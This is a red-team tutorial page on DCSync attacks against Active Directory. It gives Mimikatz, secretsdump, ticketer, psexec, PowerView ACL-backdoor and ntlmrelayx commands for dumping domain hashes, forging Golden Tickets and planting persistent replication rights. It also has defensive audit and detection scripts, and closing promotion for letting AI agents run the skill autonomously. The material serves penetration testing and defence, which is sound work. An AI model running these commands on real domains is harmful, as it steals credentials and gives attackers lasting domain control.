Red Team & Offensive Security · Intermediate

Conducting Domain Persistence with DCSync

Perform DCSync attacks to replicate Active Directory credentials and establish domain persistence by extracting KRBTGT, Domain Admin, and service account hashes for Golden Ticket creation.

4 min read · 8 code examples · 5 MITRE techniques


Overview

DCSync is an attack technique that abuses the Microsoft Directory Replication Service Remote Protocol (MS-DRSR) to impersonate a Domain Controller and request password data from the target DC. The attack was introduced by Benjamin Delpy (Mimikatz author) and Vincent Le Toux, leveraging the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights. Any principal (user or computer) with these rights can replicate password hashes for any account in the domain, including the KRBTGT account. With the KRBTGT hash, attackers can forge Golden Tickets for indefinite domain persistence. DCSync is categorized as MITRE ATT&CK T1003.006 and is a critical post-exploitation technique used by APT groups including APT28 (Fancy Bear), APT29 (Cozy Bear), and FIN6.

Objectives

  • Identify accounts with DCSync (replication) rights in Active Directory
  • Perform DCSync using Mimikatz or Impacket's secretsdump.py
  • Extract the KRBTGT account hash for Golden Ticket creation
  • Dump all domain user password hashes for credential analysis
  • Forge Golden Tickets for persistent domain access
  • Grant DCSync rights to a controlled account for alternative persistence
  • Document the attack chain and persistence mechanisms

MITRE ATT&CK Mapping

  • T1003.006 - OS Credential Dumping: DCSync
  • T1558.001 - Steal or Forge Kerberos Tickets: Golden Ticket
  • T1222.001 - File and Directory Permissions Modification: Windows
  • T1098 - Account Manipulation
  • T1078.002 - Valid Accounts: Domain Accounts

Implementation Steps

Phase 1: Identify Accounts with DCSync Rights

  1. Enumerate principals with replication rights:

```powershell
# Using PowerView. With -ResolveGUIDs the ObjectAceType column holds the
# extended-right name (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All,
# DS-Replication-Get-Changes-In-Filtered-Set), so match on that name.
Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs |
    Where-Object { ($_.ObjectAceType -match 'Replication-Get') -and
                   ($_.ActiveDirectoryRights -match 'ExtendedRight') } |
    Select-Object SecurityIdentifier, ObjectAceType
```

```cypher
// Using a BloodHound Cypher query
MATCH (u)-[:DCSync|GetChanges|GetChangesAll*1..]->(d:Domain)
RETURN u.name, d.name
```

  2. Using Impacket's findDelegation.py or a custom LDAP query:

```bash
# Check with Impacket. Note: findDelegation.py reports Kerberos delegation
# settings (unconstrained, constrained, RBCD), not replication ACEs; use the
# PowerView or BloodHound query above for the DCSync rights themselves.
findDelegation.py domain.local/user:'Password123' -dc-ip 10.10.10.1
```

  3. Default accounts with DCSync rights:
     • Domain Admins
     • Enterprise Admins
     • Domain Controllers group
     • SYSTEM on Domain Controllers
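The same audit can be done offline from the domain root's security descriptor, which is what the remediation item "ACL audit" at the end of this page asks for. The following is an added example, not code from the original page or from any of the tools it lists. It assumes the SDDL string was exported from the domain object (for instance the `.Sddl` property returned by `Get-Acl` on `AD:\DC=domain,DC=local`); the sample SDDL, the SIDs in it and the `dcsync_grants`/`dcsync_capable` function names are constructed for the example. The two extended-right GUIDs are the well-known Active Directory values.

```python
"""Find principals that hold DCSync (replication) rights in a domain-root SDDL.
Added example; the SDDL below is constructed, not taken from a real domain."""
import re

# Well-known control-access right GUIDs from the AD schema.
DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_RIGHTS = {
    DS_REPL_GET_CHANGES: "DS-Replication-Get-Changes",
    DS_REPL_GET_CHANGES_ALL: "DS-Replication-Get-Changes-All",
}
FULL_CONTROL = "GenericAll"          # GA: implies every right, replication included
ALL_EXTENDED = "AllExtendedRights"   # CR with no object GUID: every extended right
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100
GENERIC_ALL = 0x10000000

_ACE_RE = re.compile(r"\(([^)]*)\)")  # one SDDL ACE: (type;flags;rights;guid;inh_guid;sid)


def _rights_tokens(rights: str):
    """Return (has_control_access, has_generic_all) for an SDDL rights field.
    The field is either a hex mask or a run of two-letter tokens; split it into
    pairs so that a run such as 'LCRP' is not mistaken for containing 'CR'."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return bool(mask & ADS_RIGHT_DS_CONTROL_ACCESS), bool(mask & GENERIC_ALL)
    toks = {rights[i:i + 2] for i in range(0, len(rights), 2)}
    return "CR" in toks, "GA" in toks


def dcsync_grants(sddl: str) -> dict:
    """Map each SID (or SDDL alias such as DA, EA, SY) to the replication-relevant
    rights it is explicitly *allowed* on the object described by `sddl`."""
    dacl = sddl.split("D:", 1)[1] if "D:" in sddl else ""
    dacl = dacl.split("S:", 1)[0]            # drop a trailing SACL if present
    grants = {}
    for m in _ACE_RE.finditer(dacl):
        fields = m.group(1).split(";")
        if len(fields) < 6:
            continue
        ace_type, _flags, rights, obj_guid, _inh_guid, sid = fields[:6]
        if ace_type not in ("A", "OA"):      # ignore deny (D/OD) and audit ACEs
            continue
        has_cr, has_ga = _rights_tokens(rights)
        found = set()
        if has_ga:
            found.add(FULL_CONTROL)
        if has_cr:
            guid = obj_guid.lower()
            if guid == "":
                found.add(ALL_EXTENDED)
            elif guid in REPL_RIGHTS:
                found.add(REPL_RIGHTS[guid])
        if found:
            grants.setdefault(sid, set()).update(found)
    return grants


def dcsync_capable(grants: dict) -> set:
    """SIDs that can run a full DCSync: both replication rights, or an umbrella right."""
    both = set(REPL_RIGHTS.values())
    return {sid for sid, r in grants.items()
            if both <= r or FULL_CONTROL in r or ALL_EXTENDED in r}


# Constructed sample: DCs with Get-Changes only, Enterprise Admins and one
# ordinary user (RID 1105) with both rights, SYSTEM with full control, an
# unrelated extended right (User-Force-Change-Password), a deny ACE, and a
# plain read ACE whose token run 'LCRPLORC' must not be read as 'CR'.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DC)"
    "(OA;;CR;00299570-246d-11d0-a768-00aa006e0529;;DC)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;EA)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;EA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
    "(A;;GA;;;SY)"
    "(A;;LCRPLORC;;;AU)"
    "(OD;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1106)"
)

if __name__ == "__main__":
    grants = dcsync_grants(SAMPLE_SDDL)
    for sid, rights in sorted(grants.items()):
        print(f"{sid:60} {', '.join(sorted(rights))}")
    print("full DCSync capability:", sorted(dcsync_capable(grants)))
```

Anything the script lists that is not a Domain Controller, an administrative group, or a known directory-synchronisation account is an audit finding. The SIDs come out unresolved; resolving them against the directory is left to the caller so the parser stays offline.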

Phase 2: DCSync Credential Extraction

  1. Using Mimikatz (Windows):

```powershell
# Dump a specific account (KRBTGT for Golden Ticket)
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:krbtgt"

# Dump the built-in Administrator
mimikatz.exe "lsadump::dcsync /domain:domain.local /user:administrator"

# Dump all domain accounts
mimikatz.exe "lsadump::dcsync /domain:domain.local /all /csv"
```

  2. Using Impacket secretsdump.py (Linux):

```bash
# Dump all credentials
secretsdump.py domain.local/admin:'Password123'@10.10.10.1

# Dump a specific user
secretsdump.py -just-dc-user krbtgt domain.local/admin:'Password123'@10.10.10.1

# Dump only NTLM hashes (no Kerberos keys)
secretsdump.py -just-dc-ntlm domain.local/admin:'Password123'@10.10.10.1

# Using Kerberos authentication
export KRB5CCNAME=admin.ccache
secretsdump.py -k -no-pass domain.local/admin@DC01.domain.local
```

Phase 3: Golden Ticket Creation

  1. Using Mimikatz with the extracted KRBTGT hash (each command is one quoted argument; the shell-style backslash continuation does not work here):

```powershell
# Create Golden Ticket and inject it into the current session (/ptt)
mimikatz.exe "kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX /krbtgt:<krbtgt_ntlm_hash> /ptt"

# Create with specific group memberships (RIDs 512,513,518,519,520)
mimikatz.exe "kerberos::golden /user:fakeadmin /domain:domain.local /sid:S-1-5-21-XXXXXXXXXX /krbtgt:<krbtgt_ntlm_hash> /groups:512,513,518,519,520 /ptt"
```

  2. Using Impacket ticketer.py (Linux):

```bash
# Create Golden Ticket
ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid S-1-5-21-XXXXXXXXXX \
    -domain domain.local administrator

# Use the ticket
export KRB5CCNAME=administrator.ccache
psexec.py -k -no-pass domain.local/administrator@DC01.domain.local
```

Phase 4: Persistence via DCSync Rights

  1. Grant DCSync rights to a controlled account for persistence:

```powershell
# Using PowerView. -Rights DCSync adds the replication extended rights
# (Get-Changes, Get-Changes-All, Get-Changes-In-Filtered-Set) on the domain root.
# PowerShell continues lines with a backtick, not a backslash.
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" `
    -PrincipalIdentity backdoor_user -Rights DCSync

# Verify the rights were added (replace backdoor_user_SID with the account's SID)
Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs |
    Where-Object { $_.SecurityIdentifier -match "backdoor_user_SID" } |
    Select-Object SecurityIdentifier, ObjectAceType
```

  2. Using ntlmrelayx.py for automated DCSync rights escalation:

```bash
# Relay authentication to LDAP on the DC and add DCSync rights to the named user
ntlmrelayx.py -t ldap://DC01.domain.local --escalate-user backdoor_user
```

Tools and Resources

| Tool | Purpose | Platform |
|------|---------|----------|
| Mimikatz | DCSync extraction, Golden Ticket creation | Windows |
| secretsdump.py | Remote DCSync (Impacket) | Linux (Python) |
| ticketer.py | Golden Ticket creation (Impacket) | Linux (Python) |
| PowerView | ACL enumeration and modification | Windows (PowerShell) |
| Rubeus | Kerberos ticket manipulation | Windows (.NET) |
| ntlmrelayx.py | DCSync rights escalation via relay | Linux (Python) |

Critical Hashes to Extract

| Account | Purpose | Persistence Value |
|---------|---------|-------------------|
| krbtgt | Golden Ticket creation | Indefinite domain access |
| Administrator | Direct DA access | Immediate privileged access |
| Service accounts | Lateral movement | Service access across domain |
| Computer accounts | Silver Ticket creation | Service-level impersonation |

Detection Signatures

| Indicator | Detection Method |
|-----------|------------------|
| DrsGetNCChanges RPC calls from non-DC sources | Network monitoring for DRSUAPI traffic from unusual IPs |
| Event 4662 with Replicating Directory Changes GUIDs | Windows Security Log on DC (1131f6aa-/1131f6ad- GUIDs) |
| Event 4624 with Golden Ticket anomalies | Logon events with impossible SIDs or non-existent users |
| ACL modifications on domain root object | Event 5136 (directory service changes) |
| Replication traffic volume spike | Network baseline deviation monitoring |
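The two Windows Security Log rows above (4662 with the replication GUIDs, 5136 on the domain root) are the ones a detection engineer can turn into logic without network telemetry. The following is an added example, not code from the original page or from any tool it lists. It assumes events have already been parsed out of the Security log into dictionaries keyed by the event's XML field names (`SubjectUserName`, `Properties`, `AttributeLDAPDisplayName`, `ObjectDN`, `AttributeValue`); the sample events, account names, the allowlist and the `triage` function are constructed for the example. The GUIDs are the well-known DS-Replication-Get-Changes and DS-Replication-Get-Changes-All values.

```python
"""Triage 4662 / 5136 events for DCSync indicators.
Added example; the events below are constructed, not real log records."""
import re

DS_REPL_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPL_GUIDS = {DS_REPL_GET_CHANGES, DS_REPL_GET_CHANGES_ALL}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def is_domain_root(dn: str) -> bool:
    """A domain root DN is made only of DC= components (no CN=/OU= prefix)."""
    return dn != "" and not dn.upper().startswith(("CN=", "OU="))


def triage(events, dc_accounts, allowlist):
    """Return alerts for replication access by non-DC principals (4662) and for
    domain-root DACL changes that introduce replication rights (5136).
    dc_accounts: DC computer accounts ("DC01$"); allowlist: principals that
    legitimately replicate, e.g. a directory-synchronisation service account."""
    dcs = {a.upper() for a in dc_accounts}
    allowed = {a.lower() for a in allowlist}
    alerts = []
    for ev in events:
        subject = ev.get("SubjectUserName", "")
        eid = ev.get("EventID")
        if eid == 4662:
            hit = set(GUID_RE.findall(ev.get("Properties", "").lower())) & REPL_GUIDS
            if not hit or subject.upper() in dcs or subject.lower() in allowed:
                continue
            # Get-Changes-All is the right that returns secret attributes, so it
            # is the stronger signal; Get-Changes alone is worth a look but not a page.
            severity = "high" if DS_REPL_GET_CHANGES_ALL in hit else "medium"
            alerts.append({"event_id": 4662, "subject": subject, "severity": severity,
                           "reason": "replication control access by non-DC principal: "
                                     + ", ".join(sorted(hit))})
        elif eid == 5136:
            if ev.get("AttributeLDAPDisplayName") != "nTSecurityDescriptor":
                continue
            if not is_domain_root(ev.get("ObjectDN", "")):
                continue
            value = ev.get("AttributeValue", "").lower()
            if REPL_GUIDS & set(GUID_RE.findall(value)):
                alerts.append({"event_id": 5136, "subject": subject, "severity": "high",
                               "reason": "domain-root DACL rewritten with replication rights"})
    return alerts


# Constructed sample data. %%7688 is the "Control Access" accessmask literal
# that 4662 events carry in the Properties field.
REPL_PROPS = "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n\t{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
DC_ACCOUNTS = ["DC01$", "DC02$"]
ALLOWLIST = ["MSOL_1a2b3c4d"]   # constructed sync-account name
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "DC02$", "Properties": REPL_PROPS},          # DC-to-DC: benign
    {"EventID": 4662, "SubjectUserName": "svc_backup", "Properties": REPL_PROPS},     # non-DC, both rights
    {"EventID": 4662, "SubjectUserName": "MSOL_1a2b3c4d", "Properties": REPL_PROPS},  # allowlisted
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "%%7688\n\t{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},                # Get-Changes only
    {"EventID": 4662, "SubjectUserName": "jdoe",
     "Properties": "%%7688\n\t{00299570-246d-11d0-a768-00aa006e0529}"},                # unrelated extended right
    {"EventID": 5136, "SubjectUserName": "helpdesk1", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "ObjectDN": "DC=domain,DC=local",
     "AttributeValue": "O:DAG:DAD:AI(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"},
    {"EventID": 5136, "SubjectUserName": "helpdesk1", "AttributeLDAPDisplayName": "description",
     "ObjectDN": "CN=jdoe,OU=Users,DC=domain,DC=local", "AttributeValue": "new desk"},
    {"EventID": 5136, "SubjectUserName": "admin", "AttributeLDAPDisplayName": "nTSecurityDescriptor",
     "ObjectDN": "CN=jdoe,OU=Users,DC=domain,DC=local",
     "AttributeValue": "O:DAG:DAD:(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111111111-2222222222-3333333333-1105)"},
]

if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS, DC_ACCOUNTS, ALLOWLIST):
        print(a["event_id"], a["severity"], a["subject"], "-", a["reason"])
```

The DC list and allowlist are the whole tuning surface: 4662 fires for every legitimate replication cycle, so without suppressing DC computer accounts and the known synchronisation account the rule is unusable, and any entry added to that allowlist should itself be reviewed against the ACL audit.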

Validation Criteria

  • [ ] Accounts with DCSync rights enumerated
  • [ ] KRBTGT hash extracted via DCSync
  • [ ] All domain credentials dumped successfully
  • [ ] Golden Ticket forged and validated for DA access
  • [ ] DCSync rights persistence mechanism established (if in scope)
  • [ ] Access to Domain Controller validated with Golden Ticket
  • [ ] Evidence documented with hash values and timestamps
  • [ ] Remediation recommendations provided (double KRBTGT reset, ACL audit)

Compliance Framework Mapping

This skill supports compliance evidence collection across multiple frameworks:

  • SOC 2: CC4.1 (Monitoring & Evaluation), CC7.1 (Monitoring)
  • ISO 27001: A.14.2 (Secure Development), A.18.2 (Information Security Reviews)
  • NIST 800-53: CA-8 (Penetration Testing), RA-5 (Vulnerability Scanning)
  • NIST CSF: ID.RA (Risk Assessment), PR.IP (Information Protection)

Claw GRC Tip: When this skill is executed by a registered agent, compliance evidence is automatically captured and mapped to the relevant controls in your active frameworks.

Deploying This Skill with Claw GRC

Agent Execution

Register this skill with your Claw GRC agent for automated execution:

```text
# Install via CLI
npx claw-grc skills add conducting-domain-persistence-with-dcsync

# Or load dynamically via MCP
grc.load_skill("conducting-domain-persistence-with-dcsync")
```

Audit Trail Integration

When executed through Claw GRC, every step of this skill generates tamper-evident audit records:

  • SHA-256 chain hashing ensures no step can be modified after execution
  • Evidence artifacts (configs, scan results, logs) are automatically attached to relevant controls
  • Trust score impact — successful execution increases your agent's trust score

Continuous Compliance

Schedule this skill for recurring execution to maintain continuous compliance posture. Claw GRC monitors for drift and alerts when re-execution is needed.

Use with Claw GRC Agents

This skill is fully compatible with Claw GRC's autonomous agent system. Deploy it to any registered agent via MCP, and every execution will be logged in the tamper-evident audit trail.

```text
// Load this skill in your agent
npx claw-grc skills add conducting-domain-persistence-with-dcsync
// Or via MCP
grc.load_skill("conducting-domain-persistence-with-dcsync")
```

Tags

red-team, active-directory, dcsync, persistence, credential-dumping, golden-ticket, mimikatz
